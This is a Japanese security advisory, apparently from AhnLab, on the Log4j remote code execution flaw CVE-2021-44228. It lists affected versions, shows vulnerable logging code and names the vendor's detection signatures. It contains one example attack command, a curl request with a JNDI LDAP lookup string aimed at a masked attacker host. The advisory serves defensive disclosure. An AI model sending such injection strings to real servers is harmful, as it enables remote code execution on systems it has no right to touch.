2021年12月10日、Apache Log4j 脆弱性(CVE-2021-44228)が公開されたことにより、Github に様々な POC(Proof of Concept:概念実証)がアップロードされた。Log4j 脆弱性は攻撃者がログメッセージに不正なアドレスクラスを挿入し、Web サーバーに攻撃者が製作した不正なクラスを実行させることができるため、波及力が大きい。
AhnLab では Log4j の脆弱性を利用した攻撃を検知するためにネットワーク遮断シグネチャをアップデートし、以下に Log4j 脆弱性についての説明および V3 製品による検知映像を公開する。
1. 脆弱性の対象およびバージョン
以下の条件と一致する製品は、この脆弱性の影響を受ける。
- Apache Log4j 2.0-beta9 ~ 2.12.1 および 2.13.0 ~ 2.15.0 バージョン
- Apache Log4j 1.2.x のすべてのバージョン
2. 脆弱性を利用した攻撃の方法
Log4j を利用するサービスにおいて user-agent で送信された文字列をログとして記録するコードが含まれている場合、以下のように攻撃を実行することができる。
[サーバーソースコードの一部]
static Logger log = LogManager.getLogger(VulnerableLog4jExampleHandler.class.getName());
...
String userAgent = he.getRequestHeader("user-agent");
String response = "<h1>Hello There, " + userAgent + "!</h1>";
log.error("Request User Agent:{}", userAgent);
...[脆弱性を利用した攻撃]
xxx.xxx.xxx.xxx/a
ex) # curl 127.0.0.1:8080 -H “X-Api-Version: ${jndi:ldap://xxx.xxx.xxx.xxx/a}”
3. AhnLab 製品の対応
現在 AhnLab では、V3 および TG/IPX、AIPS、HIPS 製品からこの脆弱性の検知が可能である。ただし、V3 製品の場合ネットワーク侵入遮断オプションを有効化しなければ検知が不可能なため、log4j 脆弱性の予防のためにできる限りネットワーク侵入遮断を使用することを推奨する。
- Apache_Log4j_JndiManager_JNDI_Injection-1(CVE-2021-44228) (V3 エンジンバージョン : 2021.12.22.03)
- Apache_Log4j_JndiManager_JNDI_Injection-2(CVE-2021-44228) (V3 エンジンバージョン : 2021.12.22.03)
- Apache_Log4j_JndiManager_JNDI_Injection-3(CVE-2021-44228) (V3 エンジンバージョン : 2021.12.22.03)
- Apache_Log4j_JndiManager_JNDI_Injection-4(CVE-2021-44228) (V3 エンジンバージョン : 2021.12.22.03)
- Apache_Log4j_JndiManager_JNDI_Injection-5(CVE-2021-44228) (V3 エンジンバージョン : 2021.12.22.03)
- Apache_Log4j_JndiManager_JNDI_Injection-6(CVE-2021-44228) (V3 エンジンバージョン : 2021.12.22.03)
- Apache_Log4j_JndiManager_JNDI_Injection-7(CVE-2021-44228) (V3 エンジンバージョン : 2021.12.22.03)
- Apache_Log4j_JndiManager_JNDI_Injection-8(CVE-2021-44228) (V3 エンジンバージョン : 2021.12.22.03)
以下の映像は Log4j 脆弱性(CVE-2021-44228)を V3 企業向け有料製品において、ネットワーク遮断機能により検知および遮断を実行する映像である。
関連 IOC および詳細な解析情報は、AhnLab の次世代脅威インテリジェンスプラットフォーム「AhnLab TIP」サブスクリプションサービスを通して確認できる。
Categories:マルウェアの情報